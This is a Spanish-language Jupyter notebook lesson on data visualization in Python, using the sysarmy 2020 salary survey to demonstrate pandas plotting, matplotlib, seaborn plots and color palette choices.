# La visualización de datos es el proceso de proveer una representación visual de datos. En esta clase revisaremos algunas de las bibliotecas más comunes para este propósito dentro del ecosistema de python y al final de la misma tendremos herramientas para comunicar datos de una manera efectiva.
#
# ## Bibliotecas
# - Módulo de plotting de pandas
# - Pyplot
# - Seaborn
# - Pandas profiling
# # Descargamos la data
# Vamos a utilizar los datos de la [encuesta de sueldos 2020.02](https://sysarmy.com/blog/posts/resultados-de-la-encuesta-de-sueldos-2020-2/) de [sysarmy](https://sysarmy.com/es/).
# +
# Fix: "GSPREADHSEET" was misspelled; the name is defined and used only in
# this cell, so renaming is safe. Note this binds the *bound method*
# str.format, so it is later called like a function with gid=...
GSPREADSHEET_DOWNLOAD_URL = (
    "https://docs.google.com/spreadsheets/d/{gid}/export?format=csv&id={gid}".format
)
SYSARMY_2020_2_GID = '1FxzaPoS0AkN8E_-aeobpr7FHAAy8U7vWcGE7PY4kJmQ'
# -
# The first 9 rows of the published sheet are preamble, not data.
df = pd.read_csv(GSPREADSHEET_DOWNLOAD_URL(gid=SYSARMY_2020_2_GID), skiprows=9)
# ## Una pequeña preview
# Show every column when displaying the (wide) survey DataFrame.
pd.options.display.max_columns = None
df.head()
# # Pandas plotting
#
#
# Pandas incorpora algunas facilidades para [visualizaciones](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html) que son _wrappers_ alrededor de matplotlib. Se pueden utilizar [otros backends](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#plotting-backends) desde la versión 0.25.
#
# Veremos algunos plots sencillos aquí.
# ## Pie chart
# Tenemos una variable binaria en la encuesta de sueldos que indica si la persona que respondió contribuye a proyectos open source. La respuesta es por `sí` o por `no`. Queremos ver como se distribuyen las respuestas. Para esto, hagamos un [pie chart](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#pie-plot).
# Pie chart of the yes/no open-source-contribution answers, with percents.
df['¿Contribuís a proyectos open source?'].value_counts().plot(
    kind='pie', autopct='%1.0f%%'
)
# ## Barplot
#
# Ahora, consideremos la elección de sistemas operativos:
# Frequency table of operating-system answers, most common first.
df['¿Qué SO usás en tu laptop/PC para trabajar?'].value_counts().sort_values(
    ascending=False
)
# Con un pie plot, quedaría demasiado... complicado de interpretar:
# Same data as a pie chart -- shown here as a counter-example (hard to read).
df['¿Qué SO usás en tu laptop/PC para trabajar?'].value_counts().plot(
    kind='pie', autopct='%1.0f%%'
)
# BSD es una elección poco común, queda totalmente perdida. Por otro lado, sin las anotaciones de los porcentajes, sería muy dificil saber la diferencia entre `macOS` y `GNU/Linux`. `Windows` es más de la mitad, pero... ¿Cuánto mas?
#
# Por esto, es mejor un [bar plot](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#bar-plots):
# Better: a bar plot makes the rare categories and relative sizes visible.
df['¿Qué SO usás en tu laptop/PC para trabajar?'].value_counts().sort_values(
    ascending=False
).plot(kind='bar')
# ## Scatter plot
#
# Ahora tenemos la duda, ¿Cómo se relaciona el salario bruto con el salario neto? Tenemos puntos en dos dimensiones y queremos entender como se relacionan. Para ello, un [scatter plot](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#scatter-plot) es adecuado:
# Scatter of net vs gross salary to inspect their relationship.
df.plot(
    x='Salario mensual NETO (en tu moneda local)',
    y='Salario mensual BRUTO (en tu moneda local)',
    kind='scatter',
)
# Tenemos un montón de puntos apelotonados en la diagonal, veamos de reducir el diámetro de cada punto:
# Same scatter with smaller markers (s=5) to reduce overplotting.
df.plot(
    x='Salario mensual NETO (en tu moneda local)',
    y='Salario mensual BRUTO (en tu moneda local)',
    kind='scatter',
    s=5,
)
# ## Histograma
#
# Ahora, la encuesta considera también los ajustes salariales. Ese porcentaje varía por empresa. ¿hay muchos valores únicos?
# Count distinct adjustment percentages (too many for a bar plot).
df['¿De qué % fue el ajuste total?'].nunique()
# Sí, montones. Podemos hacer un bar plot?
# +
# df['¿De qué % fue el ajuste total?'].plot(kind='bar')
# -
# Podemos _intentarlo_ pero tarda una barbaridad en renderizarse.
#
# Entonces, tenemos un soporte continuo, demasiados valores únicos. Seamos inteligentes y hagamos un [histograma](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#histograms).
# Histogram with the default 10 bins.
df['¿De qué % fue el ajuste total?'].plot(kind='hist')
# Cambiando la cantidad de `bins` tenemos mayor granularidad:
# More bins give finer granularity of the same distribution.
df['¿De qué % fue el ajuste total?'].plot(kind='hist', bins=25)
df['¿De qué % fue el ajuste total?'].plot(kind='hist', bins=50)
# ## Box plots
#
# Siguiendo la línea de los salarios netos y brutos... ¿Cuánto es la media? ¿La mediana? Podemos tener un resumen estadístico con un [box plot](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#box-plots)
# Box plot of both salary columns, filtering out outliers above 500k.
df[
    (df['Salario mensual NETO (en tu moneda local)'] < 500000)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 500000)
][
    [
        'Salario mensual NETO (en tu moneda local)',
        'Salario mensual BRUTO (en tu moneda local)',
    ]
].plot(
    kind='box'
)
# Los labels quedan feos... como un hack, podemos renombrarlos:
# Rename the long column headers just before plotting so the box-plot
# tick labels stay short (the DataFrame itself is left untouched).
df[
    [
        'Salario mensual NETO (en tu moneda local)',
        'Salario mensual BRUTO (en tu moneda local)',
    ]
].rename(
    columns={
        'Salario mensual NETO (en tu moneda local)': 'Salario neto',
        'Salario mensual BRUTO (en tu moneda local)': 'Salario bruto',
    }
).plot(
    kind='box'
)
# # Matplotlib
# Dijimos que de fondo pandas usa [matplotlib](https://matplotlib.org) para hacer los plots. Es una librería que permite trabajar a bajo nivel, pero que también tiene un módulo de alto nivel llamado [pyplot](https://matplotlib.org/api/pyplot_api.html) que ofrece una interfaz similar a matlab, y es bastante cómoda. Muchas librerías de visualizaciones usan de fondo matplotlib.
#
# Si revisamos los plots que hemos visto, nos gustaría poder cambiar algunas cosas:
# - el tamaño
# - la escala
# - agregarle título
# - descripción del eje y
# - descripción del eje x
# - etc
#
# Revisaremos estos conceptos para trabajar más comodamente al momento de hacer plots
from matplotlib import pyplot as plt
import matplotlib
# ## Elementos de un plot
# El siguiente código ha sido tomado de [la documentación de matplotlib](https://matplotlib.org/3.1.1/gallery/showcase/anatomy.html#anatomy-of-a-figure) para mostrar los diferentes elementos de un plot
# + jupyter={"source_hidden": true}
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import AutoMinorLocator, MultipleLocator, FuncFormatter
# Fixed seed so the demo figure is reproducible.
np.random.seed(19680801)
# Two smooth signals plus random samples between them.
X = np.linspace(0.5, 3.5, 100)
Y1 = 3 + np.cos(X)
Y2 = 1 + np.cos(1 + X / 0.75) / 2
Y3 = np.random.uniform(Y1, Y2, len(X))
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(1, 1, 1, aspect=1)
def minor_tick(x, pos):
    """Minor-tick formatter: hide whole numbers, show two decimals otherwise."""
    is_whole = (x % 1.0) == 0
    return "" if is_whole else "%.2f" % x
# Configure tick locators/formatters, limits, grid, and the three example
# series for the "anatomy of a figure" demo.
ax.xaxis.set_major_locator(MultipleLocator(1.000))
ax.xaxis.set_minor_locator(AutoMinorLocator(4))
ax.yaxis.set_major_locator(MultipleLocator(1.000))
ax.yaxis.set_minor_locator(AutoMinorLocator(4))
ax.xaxis.set_minor_formatter(FuncFormatter(minor_tick))
ax.set_xlim(0, 4)
ax.set_ylim(0, 4)
ax.tick_params(which='major', width=1.0)
ax.tick_params(which='major', length=10)
ax.tick_params(which='minor', width=1.0, labelsize=10)
ax.tick_params(which='minor', length=5, labelsize=10, labelcolor='0.25')
ax.grid(linestyle="--", linewidth=0.5, color='.25', zorder=-10)
ax.plot(X, Y1, c=(0.25, 0.25, 1.00), lw=2, label="Blue signal", zorder=10)
ax.plot(X, Y2, c=(1.00, 0.25, 0.25), lw=2, label="Red signal")
ax.plot(X, Y3, linewidth=0, marker='o', markerfacecolor='w', markeredgecolor='k')
ax.set_title("Anatomy of a figure", fontsize=20, verticalalignment='bottom')
ax.set_xlabel("X axis label")
ax.set_ylabel("Y axis label")
ax.legend()
def circle(x, y, radius=0.15):
    """Draw a highlight ring on the module-level ``ax`` at (x, y)."""
    from matplotlib.patches import Circle
    from matplotlib.patheffects import withStroke
    ring = Circle(
        (x, y),
        radius,
        clip_on=False,
        zorder=10,
        linewidth=1,
        edgecolor='black',
        facecolor=(0, 0, 0, 0.0125),
        path_effects=[withStroke(linewidth=5, foreground='w')],
    )
    ax.add_artist(ring)
def text(x, y, text):
    """Place a bold blue label on the module-level ``ax`` at (x, y)."""
    label_style = dict(
        backgroundcolor="white",
        ha='center',
        va='top',
        weight='bold',
        color='blue',
    )
    ax.text(x, y, text, **label_style)
# Call out each anatomical element of the figure with a ring + label.
# Minor tick
circle(0.50, -0.10)
text(0.50, -0.32, "Minor tick label")
# Major tick
circle(-0.03, 4.00)
text(0.03, 3.80, "Major tick")
# Minor tick
circle(0.00, 3.50)
text(0.00, 3.30, "Minor tick")
# Major tick label
circle(-0.15, 3.00)
text(-0.15, 2.80, "Major tick label")
# X Label
circle(1.80, -0.27)
text(1.80, -0.45, "X axis label")
# Y Label
circle(-0.27, 1.80)
text(-0.27, 1.6, "Y axis label")
# Title
circle(1.60, 4.13)
text(1.60, 3.93, "Title")
# Blue plot
circle(1.75, 2.80)
text(1.75, 2.60, "Line\n(line plot)")
# Red plot
circle(1.20, 0.60)
text(1.20, 0.40, "Line\n(line plot)")
# Scatter plot
circle(3.20, 1.75)
text(3.20, 1.55, "Markers\n(scatter plot)")
# Grid
circle(3.00, 3.00)
text(3.00, 2.80, "Grid")
# Legend
circle(3.70, 3.80)
text(3.70, 3.60, "Legend")
# Axes
circle(0.5, 0.5)
text(0.5, 0.3, "Axes")
# Figure
circle(-0.3, 0.65)
text(-0.3, 0.45, "Figure")
color = 'blue'
# Arrows pointing at the axes spines.
ax.annotate(
    'Spines',
    xy=(4.0, 0.35),
    xytext=(3.3, 0.5),
    weight='bold',
    color=color,
    arrowprops=dict(arrowstyle='->', connectionstyle="arc3", color=color),
)
ax.annotate(
    '',
    xy=(3.15, 0.0),
    xytext=(3.45, 0.45),
    weight='bold',
    color=color,
    arrowprops=dict(arrowstyle='->', connectionstyle="arc3", color=color),
)
ax.text(
    4.0, -0.4, "Made with http://matplotlib.org", fontsize=10, ha="right", color='.5'
)
plt.show()
# -
# ### Figuras
# En lo que nos es relevante ahora, una [figura](https://matplotlib.org/faq/usage_faq.html#figure) es un contenedor de plots. Las figuras tienen un identificador único. Podemos obtener la figura activa con `plt.gcf()` (`g`et `c`urrent `f`igure) o crear una nueva con `plt.figure()`.
#
# Algunos parámetros que nos importan:
# ```
# figsize(float, float), default: rcParams["figure.figsize"] (default: [6.4, 4.8])
# Width, height in inches.
#
# dpifloat, default: rcParams["figure.dpi"] (default: 100.0)
# The resolution of the figure in dots-per-inch.
# ```
# ### Axis
# Un [axis](https://matplotlib.org/faq/usage_faq.html#axes) es un plot per se, digamos.
# ### Axis labels
# Son las descripciones en el eje x e y.
# ### Title
# Es el título de la figura (no del plot).
# ### Legend
# Son descripciones de colecciones de datos.
# ## Escalando los plots
#
# Tenemos dos parámetros para ello. Hacen cosas distintas.
#
# Por un lado `figsize` cambia el tamaño en pulgadas de la figura. `dpi` cambia la cantidad de pixels que hay en una pulgada.
#
# Entonces dada una figura con figsize $(w,h)$ y dpi $d$: $$p_x = d*w\\p_y = d*h $$
#
# Por defecto `dpi` vale `100` y `figsize` vale `[6.4, 4.8]`, de modo que obtendremos plots de `640 x 480`.
#
# Podemos cambiar los valores por defecto de `matplotlib` a través del diccionario `rcParams`:
#
# ```python
# matplotlib.rcParams['figure.dpi'] = 150
# ```
#
# Veamos ahora algunos ejemplos.
# The same pie chart at three scales: default, 1.5x figsize, and higher dpi.
plt.figure()
df['¿Contribuís a proyectos open source?'].value_counts().plot(
    kind='pie', autopct='%1.0f%%'
)
plt.show()
plt.figure(figsize=(6.4 * 1.5, 4.8 * 1.5), dpi=100)
df['¿Contribuís a proyectos open source?'].value_counts().sort_index().plot(
    kind='pie', autopct='%1.0f%%'
)
plt.show()
# Font sizes are relative to the dpi, so raising dpi scales text too.
plt.figure(figsize=(6.4, 4.8), dpi=150)
df['¿Contribuís a proyectos open source?'].value_counts().sort_index().plot(
    kind='pie', autopct='%1.0f%%'
)
plt.show()
# Recomendamos cambiar el tamaño con DPI si lo que se quiere es ver la visualizacion "mas grande", si lo que se quiere es cambiar la forma se puede usar el figsize
# ## Plots con pyplot
#
# Vamos a repetir un poco los plots anteriores pero revisando la api de pyplot y cambiando algunas cosas.
# ### Bar plot
# Bar plot of OS usage via the pyplot API, with labels and a title.
plt.figure(dpi=(125))
users_per_os = (
    df['¿Qué SO usás en tu laptop/PC para trabajar?']
    .value_counts()
    .sort_values(ascending=False)
)
plt.bar(users_per_os.index, users_per_os.values)
plt.ylabel("Usuarios")
plt.xlabel("Sistema operativo")
plt.title('¿Qué SO usás en tu laptop/PC para trabajar?')
plt.show()
# Algo que podemos ver es que `*BSD` es un valor prácticamente invisible. ¿Mejora si se pone en escala y-logaritmica?
# Same bar plot on a logarithmic y scale so the rare category is visible.
plt.figure(dpi=(125))
users_per_os = (
    df['¿Qué SO usás en tu laptop/PC para trabajar?']
    .value_counts()
    .sort_values(ascending=False)
)
plt.bar(users_per_os.index, users_per_os.values)
plt.yscale("log")
plt.ylabel("Usuarios")
plt.xlabel("Sistema operativo")
plt.title('¿Qué SO usás en tu laptop/PC para trabajar?')
plt.show()
# No mucho, pero al menos se ve que está en el orden de $10^0$
#
# Y que es ese `plt.show()` que estamos poniendo ahora? Básicamente muestra todas las figuras abiertas. En un notebook no hay mucha necesidad de usarlo, pero veremos el `__repr__` del último elemento de la celda si no lo hemos asignado a una variable (o si no le hemos puesto un `;` al final).
# ### Scatter plot
#
# Revisemos un scatter plot, pero con la api de pyplot.
# Net vs gross salary scatter using plt.scatter directly.
plt.figure(dpi=(150))
plt.scatter(
    x=df['Salario mensual NETO (en tu moneda local)'],
    y=df['Salario mensual BRUTO (en tu moneda local)'],
    s=5,
)
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# ¿Sería interesante ver que tan conforme está la gente con sus salarios no? Podemos introducir esa columna como color del scatter plot.
# +
# Encode salary-satisfaction as the marker color (no legend yet).
plt.figure(dpi=(125))
plt.scatter(
    x=df['Salario mensual NETO (en tu moneda local)'],
    y=df['Salario mensual BRUTO (en tu moneda local)'],
    s=5,
    c=df['¿Qué tan conforme estás con tu sueldo?'],
)
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# No tenemos ni idea de que es cada color. Pongamos un [legend](https://matplotlib.org/api/_as_gen/matplotlib.pyplot.legend.html#matplotlib.pyplot.legend)!
# +
# One scatter call per satisfaction level so each gets a legend entry.
fig, ax = plt.subplots(dpi=150)
for conformity in np.sort(df['¿Qué tan conforme estás con tu sueldo?'].unique()):
    conformity_df = df[df['¿Qué tan conforme estás con tu sueldo?'] == conformity]
    ax.scatter(
        x=conformity_df['Salario mensual NETO (en tu moneda local)'],
        y=conformity_df['Salario mensual BRUTO (en tu moneda local)'],
        s=5,
        label=conformity,
        alpha=0.65,
    )
ax.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Pero hay outliers que nos complican... veamos los que están entre 10mil y 500mil
# +
# Same legend-per-level scatter, restricted to salaries in (10k, 500k).
fig, ax = plt.subplots(dpi=150)
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
    & (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
for conformity in np.sort(df_submm['¿Qué tan conforme estás con tu sueldo?'].unique()):
    conformity_df = df_submm[
        df_submm['¿Qué tan conforme estás con tu sueldo?'] == conformity
    ]
    ax.scatter(
        x=conformity_df['Salario mensual NETO (en tu moneda local)'],
        y=conformity_df['Salario mensual BRUTO (en tu moneda local)'],
        s=2,
        label=conformity,
        alpha=0.65,
    )
ax.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Como la conformidad 4 fue la ultima en ser ploteada ofusca el plot, además los colores no parecen adecuados, ya solucionaremos esto
# ### Histograma
#
# Quizás notaron ese llamado a `plt.subplots`. Vamos a ver un poco de qué se trata mientras vemos como hacer histogramas.
#
# Tanto el salario neto como el salario bruto tienen soportes continuos, y demasiados valores diferentes. ¿Estaría bueno ver un histograma de cada uno no? Sería incluso mejor tenerlos lado a lado.
# +
# Two histograms side by side (shared y axis) for gross vs net salary < 1M.
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 1e6)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 1e6)
]
fig, axes = plt.subplots(nrows=1, ncols=2, sharey=True, dpi=150, figsize=(6.4 * 2, 4.8))
axes[0].hist(df_submm['Salario mensual BRUTO (en tu moneda local)'], bins=25)
axes[0].set_title("Salario bruto")
axes[0].set_xlabel("Salario")
axes[0].set_ylabel("Cantidad")
axes[1].hist(df_submm['Salario mensual NETO (en tu moneda local)'], bins=25)
axes[1].set_title("Salario neto")
axes[1].set_xlabel("Salario")
axes[1].set_ylabel("Cantidad")
plt.show()
# -
# Sabiendo que podemos superponerlos, podriamos superponer los histogramas
# +
# Overlay the two salary histograms with alpha so both remain readable.
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 1e6)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 1e6)
]
plt.figure(dpi=150)
plt.hist(
    df_submm['Salario mensual BRUTO (en tu moneda local)'],
    bins=25,
    label="Salario bruto",
    alpha=0.5,
)
plt.hist(
    df_submm['Salario mensual NETO (en tu moneda local)'],
    bins=25,
    label="Salario neto",
    alpha=0.5,
)
plt.title("Distribución del salario neto y bruto")
plt.xlabel("Salario")
plt.ylabel("Cantidad")
plt.legend()
plt.show()
# -
# Para comparar distribuciones continuas podriamos usar tambien boxplots y violinplots.
#
# Podemos aprovechar la superposicion de plots para señalar cosas que creamos importantes.
# +
# Histogram of the adjustment percentage with a vertical reference line
# marking the official first-semester inflation figure.
plt.figure(dpi=150)
plt.hist(df['¿De qué % fue el ajuste total?'], bins=30, label="Ajuste %")
plt.title("Distribución del ajuste porcentual\npor inflación para 2020")
plt.ylabel("Frecuencia")
plt.xlabel("% del ajuste de inflación de 2020")
plt.axvline(x=13.6, color="darkred", label="Inflación 1er semestre INDEC")
plt.legend()
plt.show()
# -
# # Seaborn
import seaborn as sns
# Apply seaborn's default theme to all subsequent matplotlib figures.
sns.set()
# [Seaborn](http://seaborn.pydata.org) tambien usa matplotlib al igual que pandas, por lo que todas las funciones de matplotlib tambien le sirven
# ## Distribution plots
# ### Countplot
#
# El countplot es la forma que tiene seaborn de hacer gráficos de barras, permitiendo dividirlo de distintas formas.
# Bar chart of respondents per profession (all categories, unordered).
plt.figure(dpi=150)
sns.countplot(x="Trabajo de", data=df)
plt.ylabel("Cantidad")
plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.show()
# Podemos usar el parametro order para indicar el orden en el que lo queremos pero tambien cuales profesiones queremos
plt.figure(dpi=150)
# `order` both sorts the bars and restricts them to the 20 most common professions.
sns.countplot(
    x="Trabajo de", data=df, order=df["Trabajo de"].value_counts().iloc[:20].index
)
plt.ylabel("Cantidad")
plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.xticks(rotation=90)
plt.show()
# ### Density plot
# Podemos ver la distribución del salario como habíamos visto con el histograma
# +
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 1e6)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 1e6)
]
plt.figure(dpi=150)
# Kernel density estimate: a smoothed alternative to the histogram above.
sns.kdeplot(
    df_submm['Salario mensual NETO (en tu moneda local)'], label="Salario mensual neto"
)
plt.title("Distribución del salario neto")
plt.xlabel("Salario")
# Density values are not meaningful to readers, so hide the y ticks.
plt.yticks([], [])
plt.show()
# -
# ### Violinplot
# Boolean split: does the respondent manage at least one person?
df['Tiene gente a cargo'] = df['¿Gente a cargo?'] > 0
plt.figure(dpi=150)
plt.title("Salario NETO según si tiene gente a cargo\nen Argentina")
sns.violinplot(
    data=df[
        (df["Estoy trabajando en"] == "Argentina")
        & (df['Salario mensual NETO (en tu moneda local)'] < 500000)
    ],
    y='Salario mensual NETO (en tu moneda local)',
    x='Tiene gente a cargo',
    palette=['#D17049', "#89D15E"],
)
plt.ylabel("Salario NETO")
plt.show()
# Same violin plot as above, with readable tick labels instead of True/False.
df['Tiene gente a cargo'] = df['¿Gente a cargo?'] > 0
plt.figure(dpi=150)
plt.title("Distribución del salario NETO según\nsi tiene gente a cargo en Argentina")
sns.violinplot(
    data=df[
        (df["Estoy trabajando en"] == "Argentina")
        & (df['Salario mensual NETO (en tu moneda local)'] < 500000)
    ],
    y='Salario mensual NETO (en tu moneda local)',
    x='Tiene gente a cargo',
    palette=['#D17049', "#89D15E"],
)
plt.ylabel("Salario NETO")
# False/True coerce to tick positions 0/1.
plt.xticks([False, True], ["No", "Sí"])
plt.show()
# ### Boxplot
# Boxplot variant of the previous comparison (quartiles instead of densities).
plt.figure(dpi=150)
plt.title("Distribución del salario NETO según\nsi tiene gente a cargo en Argentina")
sns.boxplot(
    data=df[
        (df["Estoy trabajando en"] == "Argentina")
        & (df['Salario mensual NETO (en tu moneda local)'] < 500000)
    ],
    y='Salario mensual NETO (en tu moneda local)',
    x='Tiene gente a cargo',
    palette=['#D17049', "#89D15E"],
)
plt.ylabel("Salario NETO")
plt.xticks([False, True], ["No", "Sí"])
plt.show()
# ## Comparison plots
# ### Scatter plot
# Recordemos el último scatter que hicimos
# +
fig, ax = plt.subplots(dpi=150)
# Keep salaries within (1e4, 5e5) on both axes to remove outliers and noise.
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
    & (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
# One scatter series per satisfaction level so each gets a colour + legend entry.
for conformity in np.sort(df_submm['¿Qué tan conforme estás con tu sueldo?'].unique()):
    conformity_df = df_submm[
        df_submm['¿Qué tan conforme estás con tu sueldo?'] == conformity
    ]
    ax.scatter(
        x=conformity_df['Salario mensual NETO (en tu moneda local)'],
        y=conformity_df['Salario mensual BRUTO (en tu moneda local)'],
        s=2,
        label=conformity,
        alpha=0.65,
    )
ax.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Al haber ploteado en orden los distintos puntos se superponen de forma que no nos permite ver diferencias. Con el hue de seaborn podemos hacer que la superposición sea random.
# +
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
    & (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
plt.figure(dpi=150)
# hue-based colouring draws points in a mixed order, avoiding the series-on-top
# occlusion of the manual loop above.
sns.scatterplot(
    x='Salario mensual NETO (en tu moneda local)',
    y='Salario mensual BRUTO (en tu moneda local)',
    hue=df_submm['¿Qué tan conforme estás con tu sueldo?'].tolist(),
    data=df_submm,
    alpha=0.7,
)
plt.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Ahora se puede apreciar el gradiente de colores a medida que el salario aumenta
# ### Heatmap
# Pivot table: count of respondents per (salary perception, satisfaction) pair.
# Positional args: values, index, columns, aggfunc.
cooccurrence = pd.pivot_table(
    df,
    '¿Gente a cargo?',
    'Cómo creés que está tu sueldo con respecto al último semestre',
    '¿Qué tan conforme estás con tu sueldo?',
    'count',
).sort_index()
# Bare expression: renders the table when run as a notebook cell.
cooccurrence
plt.figure(dpi=150)
# NOTE(review): sns.heatmap sets its own axis labels from the pivot
# index/columns, so this earlier ylabel call may have no visible effect — confirm.
plt.ylabel("Cómo creés que está tu sueldo con respecto al último semestre", fontsize=9)
# reindex flips the row order so satisfaction level 4 appears at the top.
sns.heatmap(cooccurrence.reindex([4, 3, 2, 1]), square=True, cmap="Wistia")
plt.show()
# ## Regression plots
# ### Regplot
# Scatter plus fitted linear regression of gross vs. net salary.
plt.figure(dpi=150)
sns.regplot(
    data=df,
    x='Salario mensual NETO (en tu moneda local)',
    y='Salario mensual BRUTO (en tu moneda local)',
)
plt.show()
# ## Relational plots
# ### Lineplot
# Mean gross salary per years-of-experience value, with a confidence band.
plt.figure(dpi=150)
sns.lineplot(
    data=df, x='Años de experiencia', y='Salario mensual BRUTO (en tu moneda local)'
)
plt.show()
# # Paletas de colores
#
# La elección de colores no es una decisión menor. Permite el mapeo de números a una representación visual y distinción entre grupos distintos. Hay mucha literatura sobre los criterios que debe cumplir una paleta de colores, algunos criterios relevantes son:
# - que no sean sensitivas a deficiencias visuales
# - el ordenamiento de los colores debe ser el mismo para todas las personas intuitivamente
# - la interpolación percibida debe corresponderse con el mapa escalar subyacente
# ## Taxonomía de paletas
import matplotlib.pyplot as plt
import seaborn as sns
# Re-apply the seaborn theme (this section can be run standalone).
sns.set()
# ### Cualitativas
# Se usan para representar colecciones de clases discretas sin orden. Los colores no tienen un ordenamiento, por lo tanto no son apropiados para mapearse a un valor escalar.
# Qualitative palettes: unordered colours for discrete categories.
sns.palplot(sns.color_palette('pastel'))
plt.show()
sns.palplot(sns.color_palette('colorblind'))
plt.show()
sns.palplot(sns.color_palette('muted'))
plt.show()
# ### Secuenciales
# Son casi monocromaticas, van de un color altamente saturado hacia distintos niveles de saturación más baja. Se suele aumentar la luminancia a medida que decrece la saturación, de modo que la paleta termina en colores cercanos al blanco. Se usa para representar información que tiene un ordenamiento.
# Sequential palettes; the _r suffix reverses and _d gives a darker variant.
sns.palplot(sns.color_palette('Blues'))
plt.show()
sns.palplot(sns.color_palette('Blues_r'))
plt.show()
sns.palplot(sns.color_palette('Blues_d'))
plt.show()
# #### Cubehelix
# Es un sistema de paletas de colores que tienen un crecimiento/decrecimiento lineal en brillo y alguna variacion de tono. Lo cual implica que **se preserva la información al convertirse a blanco y negro**. Es ideal para **imprimir**.
# Cubehelix: brightness varies linearly, so it survives grayscale printing.
sns.palplot(sns.color_palette("cubehelix", 12))
plt.show()
# ### Divergentes
# Tienen dos componentes principales de color, transicionando entre ambos pasando por un color poco saturado (blanco, amarillo). Se suelen usar para representar valores escalares con un valor significativo cerca de la mediana.
#
# Es importante tratar de no usar rojo y verde.
# Diverging palettes: two hues meeting at a neutral midpoint.
sns.palplot(sns.color_palette('coolwarm', 7))
plt.show()
sns.palplot(sns.color_palette('RdBu_r', 7))
plt.show()
sns.palplot(sns.color_palette('BrBG', 7))
plt.show()
# ### Cíclicas
# Tienen dos componentes principales de color, que se encuentran en el medio y extremos en un color poco saturado. Se usan para valores que ciclan.
# +
sns.palplot(sns.color_palette("hls", 12))
plt.show()
# husl: same idea as hls but with perceptually more uniform brightness
sns.palplot(sns.color_palette("husl", 12))
plt.show()
# -
# ## Algunos casos prácticos
# Podemos indicar que color queremos con una tupla RGB donde cada elemento de la tupla es un número de 0 a 1 que indica la intensidad de alguno de los 3 colores primarios de la luz (__Rojo__, __Verde__, __Azul__) o lo que es lo mismo su codigo **hexadecimal**
# +
from __future__ import print_function
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
def rgb_to_hex(rgb):
    """Return the 6-digit lowercase hex code for an (r, g, b) tuple of 0-255 ints."""
    return '{:02x}{:02x}{:02x}'.format(*rgb)
def plot_color(r, g, b):
    """Show the pure red, green and blue components plus the combined
    (r, g, b) swatch, printing the equivalent hexadecimal code.

    r, g and b are floats in [0, 1].
    """
    print(
        "Hexadecimal: %s" % rgb_to_hex((round(r * 255), round(g * 255), round(b * 255)))
    )
    sns.palplot([(r, 0, 0), (0, g, 0), (0, 0, b), (r, g, b)])
    # Bug fix: the swatches are red, green, blue in that order, but the tick
    # labels previously listed "Azul" (blue) before "Verde" (green).
    plt.xticks([0, 1, 2, 3], ["Rojo", "Verde", "Azul", "(r,g,b)"])
    plt.grid(False)
    plt.show()
# -
# Interactive RGB sliders (ipywidgets); each channel steps in 1/255 increments.
interact(
    plot_color, r=(0.0, 1.0, 1 / 255), g=(0.0, 1.0, 1 / 255), b=(0.0, 1.0, 1 / 255)
)
# Pueden jugar con más en: https://color.adobe.com/
# Recordando el pie plot, podríamos elegir colores más adecuados en donde comunicamos contribuir a proyectos open source como algo más "positivo"
plt.figure(dpi=150)
# sort_index() orders the slices as ["No", "Sí"], pairing gray with "No"
# and green with "Sí" to frame contributing as the positive answer.
df['¿Contribuís a proyectos open source?'].value_counts()[
    ["Sí", "No"]
].sort_index().plot(kind='pie', autopct='%1.0f%%', colors=['#AEB8AF', "#4AD172"])
plt.title('¿Contribuís a proyectos open source?')
plt.ylabel("")
plt.show()
# Recordemos el countplot que hicimos
# Same top-20 countplot as before, with seaborn's default multicolour bars.
plt.figure(dpi=125)
sns.countplot(
    x="Trabajo de", data=df, order=df["Trabajo de"].value_counts().iloc[:20].index
)
plt.ylabel("Cantidad")
